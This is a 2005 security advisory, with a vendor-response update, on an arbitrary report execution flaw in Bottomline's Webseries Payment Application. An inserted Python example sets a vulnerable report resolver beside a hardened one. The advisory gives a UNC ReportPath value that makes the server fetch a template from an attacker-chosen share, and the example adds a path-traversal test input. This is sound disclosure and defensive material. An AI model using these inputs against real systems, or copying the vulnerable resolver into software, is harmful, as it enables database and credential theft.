
Portcullis Advisory 05-009 Update, Webseries Payment Application



Portcullis Security Advisory

AREAS UPDATED: VENDOR RESPONSE.

VENDOR RESPONSE:

The product vendor, Bottomline Technologies, has provided Portcullis with
the following response to the security advisory. It should be noted that
the resolution of this issue has not been verified by Portcullis:

Bottomline acknowledge that there is a slight risk of exposure of data
via unauthorised report generation. In order to further enhance the
security of the system a service pack will be released in Q1 2005. This
ensures the reporting module no longer passes the path and report
information on the URL line. This information is kept on the server and
passed using the database and additionally the report being executed is
validated against the user entitlements.

Contact Bottomline at: support@xxxxxxxxxxxxxxxx  Tel: +44 (0)1189
258253.
 
Vulnerable System: 
      
Webseries Payment Application
 
Vulnerability Title:  
 
Execution of Arbitrary Reports
 
Vulnerability discovery and development: 
 
Portcullis Security Testing Services
 
Affected systems: 
 
Bottomline Webseries Payment Application 
 
Details:
 
Portcullis consultants have discovered that by manipulating the values
of certain variables used during report selection it is possible to
cause the application to retrieve and execute arbitrary report templates
from any machine on the network capable of serving a Windows share.
 
In normal usage the Webseries application references report templates
located on the web server itself:
 
        ReportPath=E:\server\apps\WSWEB\Web+Application+Files\reports\
        ReportName=User%20Activity%20Report.rpt
 
When the value of the ReportPath variable is changed to contain a UNC
path referencing another machine on the network (as shown below), the
Webseries application appears to download and attempt to execute the
report. Note that it is the web server itself that fetches the template,
so the outbound connection to the attacker-chosen host is made by the
web server's own account; the attacker need only host a share that the
web server can reach.
 
        ReportPath=\\192.168.1.2\Shared\
        ReportName=Test.rpt
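
The advisory contains no code. The following is an added example, not
code from Portcullis or Bottomline: it places the behaviour described
above (client supplies both ReportPath and ReportName, server joins them
as-is) beside a hardened resolver of the kind the vendor response
describes, in which the path is fixed on the server, only a bare
template name is accepted from the client, UNC and traversal forms are
refused, and the selection is checked against the user's entitlements.
The reports directory is the one quoted above; the entitlement table,
user names, function names and sample requests are constructed for the
example.

```python
"""Report selection: the vulnerable shape beside a hardened one.

Added example, not code from Portcullis or Bottomline.  The reports
directory mirrors the path quoted in the advisory; the entitlement table,
user names and sample requests are constructed for illustration.
"""
import ntpath
from urllib.parse import parse_qs

# Server-side reports directory (taken from the advisory; the '+' in the
# URL decodes to a space).
REPORTS_DIR = r"E:\server\apps\WSWEB\Web Application Files\reports"

# Constructed entitlement table: which templates each user may run.
ENTITLEMENTS = {
    "auditor": {"User Activity Report.rpt"},
    "clerk": set(),
}


class ReportRejected(Exception):
    """A report selection failed validation."""


def legacy_report_path(query: str) -> str:
    """The behaviour the advisory describes: both ReportPath and ReportName
    come from the client and are joined as-is, so a UNC ReportPath makes the
    server fetch a template from an attacker-chosen share."""
    params = parse_qs(query, keep_blank_values=True)
    path = params.get("ReportPath", [""])[0]
    name = params.get("ReportName", [""])[0]
    return ntpath.join(path, name)


def resolve_report(query: str, user: str) -> str:
    """Hardened resolution along the lines of the vendor's fix: the client
    names a template only; the directory is fixed server-side, anything
    that is not a bare *.rpt file name is refused, and the final selection
    is checked against the user's entitlements."""
    params = parse_qs(query, keep_blank_values=True)
    if "ReportPath" in params:
        raise ReportRejected("client may not supply ReportPath")
    names = params.get("ReportName", [])
    if len(names) != 1:
        raise ReportRejected("exactly one ReportName is required")
    name = names[0]
    # Bare file name only: no UNC prefix (\\host\share), drive letter,
    # leading separator, embedded separators or traversal components.
    drive, _ = ntpath.splitdrive(name)
    if drive or ntpath.isabs(name) or ntpath.basename(name) != name:
        raise ReportRejected(f"not a bare file name: {name!r}")
    if name in ("", ".", "..") or not name.lower().endswith(".rpt"):
        raise ReportRejected(f"not a report template: {name!r}")
    full = ntpath.normpath(ntpath.join(REPORTS_DIR, name))
    # Belt and braces: after normalisation the template must still sit
    # inside REPORTS_DIR.
    if ntpath.commonpath([full, REPORTS_DIR]) != REPORTS_DIR:
        raise ReportRejected(f"resolved outside reports directory: {full!r}")
    if name not in ENTITLEMENTS.get(user, set()):
        raise ReportRejected(f"{user!r} is not entitled to run {name!r}")
    return full


def is_rejected(query: str, user: str) -> bool:
    """True if the hardened resolver refuses the request."""
    try:
        resolve_report(query, user)
    except ReportRejected:
        return True
    return False


if __name__ == "__main__":
    # Constructed requests: the advisory's normal case and its UNC variant.
    normal = ("ReportPath=E:\\server\\apps\\WSWEB\\Web+Application+Files"
              "\\reports\\&ReportName=User%20Activity%20Report.rpt")
    unc = "ReportPath=\\\\192.168.1.2\\Shared\\&ReportName=Test.rpt"
    for q in (normal, unc):
        print("legacy   :", legacy_report_path(q))
    for q, u in ((normal, "auditor"), (unc, "auditor"),
                 ("ReportName=User%20Activity%20Report.rpt", "auditor"),
                 ("ReportName=User%20Activity%20Report.rpt", "clerk"),
                 ("ReportName=..%5C..%5Cweb.config", "auditor")):
        try:
            print("hardened :", resolve_report(q, u))
        except ReportRejected as e:
            print("hardened : rejected ->", e)
```

The legacy function is kept only to show the shape of the flaw: it will
happily return a UNC path. On a real Windows host, syntactic checks of
this kind should be backed by an allow-list of known template names,
since reserved device names, trailing dots and spaces, and alternate
data stream suffixes are further ways a file name can resolve somewhere
other than intended.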
 
 
Impact:
 
A malicious user with knowledge of the structure of the backend database
could design a report template to disclose any information contained
within the database. Portcullis consultants believe that it is possible
to create a report template that would display usernames and passwords
(in whatever form they are stored in the database).
 
Exploit:
 
Exploit code not required.
 
Copyright: 
 
Copyright (c) Portcullis Computer Security Limited 2005, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
 
Disclaimer: 
 
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.


